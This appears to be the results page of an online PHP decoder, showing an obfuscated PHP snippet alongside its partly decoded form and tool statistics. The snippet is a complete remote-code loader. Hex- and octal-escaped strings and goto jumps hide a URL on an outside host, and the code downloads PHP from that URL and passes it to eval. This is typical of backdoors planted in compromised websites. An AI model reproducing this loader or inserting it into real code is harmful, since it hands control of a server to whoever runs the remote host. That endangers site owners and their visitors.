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PHP Decode

<?php goto INnoe; INnoe: $url = "\x68\x74\x74\160\x73\x3a\57\57\154\157\x63\154\x6f\x67\..

Decoded Output download

 goto INnoe; INnoe: $url = ""; goto oN5pW; oN5pW: $phpCode = file_get_contents($url); goto pkofU; pkofU: if ($phpCode === false) { die("Error: The file could not be loaded."); } goto Jo2Qj; Jo2Qj: eval("?>" . $phpCode); ?>

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Original Code

 goto INnoe; INnoe: $url = "\x68\x74\x74\160\x73\x3a\57\57\154\157\x63\154\x6f\x67\x2e\145\143\x6f\x2e\142\162\57\145\170\x74"; goto oN5pW; oN5pW: $phpCode = file_get_contents($url); goto pkofU; pkofU: if ($phpCode === false) { die("\x45\x72\x72\x6f\162\72\x20\124\150\145\40\x66\x69\x6c\145\40\143\x6f\x75\154\x64\x20\156\157\x74\x20\142\x65\40\154\x6f\141\144\145\144\x2e"); } goto Jo2Qj; Jo2Qj: eval("\x3f\76" . $phpCode);

Function Calls





MD5 40487f9a75b8b3ffd1d1e4babcc58d7a
Eval Count 0
Decode Time 51 ms